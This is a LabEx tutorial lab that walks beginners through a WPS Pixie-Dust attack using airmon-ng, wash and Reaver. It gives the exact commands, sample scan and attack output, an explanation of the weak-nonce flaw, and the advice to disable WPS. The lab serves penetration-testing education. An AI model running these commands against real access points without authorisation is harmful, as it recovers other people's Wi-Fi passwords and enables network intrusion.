LabEx
Log InJoin Free

Execute a WPS Pixie-Dust Attack using Reaver

Beginner
Practice Now

Introduction

Wi-Fi Protected Setup (WPS) is a feature designed to make it easy to connect devices to a secure wireless network. However, certain implementations of WPS contain a critical vulnerability that can be exploited. The Pixie-Dust attack targets a flaw in the way some wireless access points generate random numbers (nonces) during the WPS handshake. Unlike a standard brute-force attack which can take hours, a successful Pixie-Dust attack can recover the WPS PIN and the WPA/WPA2 password in a matter of seconds.

In this lab, you will step into the role of a penetration tester to learn how this attack works. You will use tools from the aircrack-ng suite and Reaver to identify a vulnerable target and execute the Pixie-Dust attack in a simulated environment. This will provide you with a practical understanding of this powerful Wi-Fi hacking technique.

Identify a Target Vulnerable to Pixie-Dust from a wash Scan

In this step, you will begin by scanning for nearby Wi-Fi networks that have WPS enabled. To do this, you first need to put your wireless interface into "monitor mode," which allows it to capture all Wi-Fi traffic in the air, not just traffic addressed to your device. The airmon-ng tool is used for this purpose.

Let's start by enabling monitor mode on the wlan0 interface. In a real scenario, this creates a new virtual interface, typically named wlan0mon.

sudo airmon-ng start wlan0

You should see output confirming that monitor mode has been enabled on a new interface named wlan0mon.

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k           Atheros Communications Inc. AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

Now that you have an interface in monitor mode, you can use the wash tool to scan for WPS-enabled Access Points (APs). wash will list all the WPS networks it detects, along with important information about them.

Run the following command to start the scan on your monitor interface:

sudo wash -i wlan0mon

After a few moments, wash will display a list of networks.

Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID               Ch  WPS Version  WPS Locked  ESSID
----------------------------------------------------------------
00:11:22:33:44:55   6   1.0          No          VulnerableAP
AA:BB:CC:DD:EE:FF   1   1.0          Yes         SecuredAP

From this output, look for a target. The ideal target for a Pixie-Dust attack is one where WPS Locked is No. In our case, the network with the ESSID VulnerableAP and BSSID 00:11:22:33:44:55 is our target. Take note of its BSSID, as you will need it in the next steps.

Start Reaver with the -K or --pixie-dust Parameter

In this step, we will prepare to launch the attack using Reaver. Reaver is a tool specifically designed to carry out brute-force attacks against WPS registrar PINs to recover WPA/WPA2 passphrases.

However, Reaver also has a special mode for the much faster Pixie-Dust attack. To enable this mode, you must use the -K or --pixie-dust command-line argument. When this argument is used, Reaver will first attempt the Pixie-Dust attack. If the target AP is not vulnerable, Reaver can then fall back to the traditional, slower brute-force method.

The basic structure of the Reaver command for a Pixie-Dust attack looks like this:

sudo reaver -i <monitor_interface> -b <target_bssid> -K

  • sudo reaver: Executes the Reaver tool with root privileges.
  • -i <monitor_interface>: Specifies the network interface that is in monitor mode (e.g., wlan0mon).
  • -b <target_bssid>: Specifies the BSSID (MAC address) of the target access point.
  • -K: This is the crucial switch that tells Reaver to perform a Pixie-Dust attack.

This step is about understanding the command's structure. In the next step, you will combine this knowledge with the information gathered from the wash scan to execute the full command.

Specify the Target BSSID and Monitor Interface

Now it's time to put everything together and launch the attack. You have identified a target BSSID and you know the command structure for a Pixie-Dust attack with Reaver.

Recall from Step 1:

  • Monitor Interface: wlan0mon
  • Target BSSID: 00:11:22:33:44:55

You will now construct the full Reaver command. We will also add the -vv (very verbose) option. This is highly recommended as it displays detailed information about the WPS exchange, including the nonces and hashes that are key to the Pixie-Dust attack. This output is essential for understanding how the attack works.

Execute the following command in your terminal to start the attack:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv

Reaver will now start communicating with the target access point. You will see a series of messages indicating the progress of the WPS handshake. Since the target is vulnerable in our simulated environment, the attack will be very fast.

Understand How Pixie-Dust Exploits Weak Nonce Generation

In this step, you will analyze the output from the Reaver command to understand the mechanics of the Pixie-Dust attack. This is a conceptual step with no new commands to run.

Look at the verbose output generated by Reaver in the previous step. You should see lines prefixed with [P], which display the values captured during the WPS exchange:

...
[+] Sending M1 message
[+] Received M2 message
[P] E-S1: d3b25a26a713c1b2
[P] E-S2: 1a84a5e22236aebd
[P] PKE: c1...e2
[P] PKR: 3a...b1
[P] E-Hash1: 7d...c3
[P] E-Hash2: 9f...a5
[P] AuthKey: 8c...99
...

Here's what's happening:

  1. WPS Handshake: The client (Reaver) and the AP exchange a series of messages (M1, M2, etc.) to authenticate.
  2. Nonce Exchange: During this handshake, they exchange "nonces" (E-S1 and E-S2), which are supposed to be large, random numbers used only once.
  3. The Flaw: The Pixie-Dust vulnerability exists in APs that generate these nonces using a weak or predictable algorithm. Instead of being truly random, the nonces are derived from or closely related to secrets that can be used to crack the PIN.
  4. Offline Cracking: Reaver captures the two nonces (E-S1, E-S2) and two hashes (E-Hash1, E-Hash2) from the AP. With these four values, it has enough information to perform an offline calculation. It brute-forces the PIN on your local machine without needing to send any more requests to the AP.

Because the cracking process is done offline and exploits the mathematical weakness in nonce generation, it bypasses the AP's rate-limiting defenses and finds the correct PIN almost instantly.

Observe the Near-Instantaneous Recovery of the PIN and Key

In this final step, you will observe the successful outcome of the attack. After Reaver performs the offline calculations, it will display the recovered credentials.

The final part of the Reaver output from Step 3 should look like this:

...
[+] Pixie-Dust attack...
[+] 100.00% complete @ 2023-10-27 10:30:00 (0 seconds remaining)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretPassword'
[+] AP SSID: 'VulnerableAP'

Let's break down the recovered information:

  • WPS PIN: '12345670': This is the 8-digit PIN for the router's WPS feature. You could use this PIN to connect other WPS-enabled devices to the network.
  • WPA PSK: 'SuperSecretPassword': This is the WPA/WPA2 Pre-Shared Key, which is the actual Wi-Fi password for the network. This is the ultimate goal of the attack.
  • AP SSID: 'VulnerableAP': This confirms the name of the network you have successfully compromised.

The most remarkable aspect is the speed. Note the "0 seconds remaining" in the output. The entire process, from initiating the handshake to recovering the key, took only a few seconds. This stands in stark contrast to a traditional WPS brute-force attack, which could take many hours or even be impossible if the AP locks WPS after several failed attempts. You have now successfully demonstrated the effectiveness of the WPS Pixie-Dust attack.

Summary

In this lab, you successfully executed a WPS Pixie-Dust attack in a simulated environment. You have gained hands-on experience with essential Wi-Fi security assessment tools and concepts.

You learned to:

  • Use airmon-ng to enable monitor mode on a wireless interface.
  • Use wash to scan for and identify WPS-enabled access points.
  • Understand the purpose of the -K (--pixie-dust) flag in Reaver.
  • Execute a targeted Pixie-Dust attack using reaver, specifying the target's BSSID.
  • Interpret the output to understand how the attack exploits weak nonce generation.
  • Observe the near-instantaneous recovery of both the WPS PIN and the WPA PSK.

This lab highlights a significant real-world vulnerability. The most effective defense against this and other WPS-related attacks is to disable the WPS feature entirely in your router's administration settings.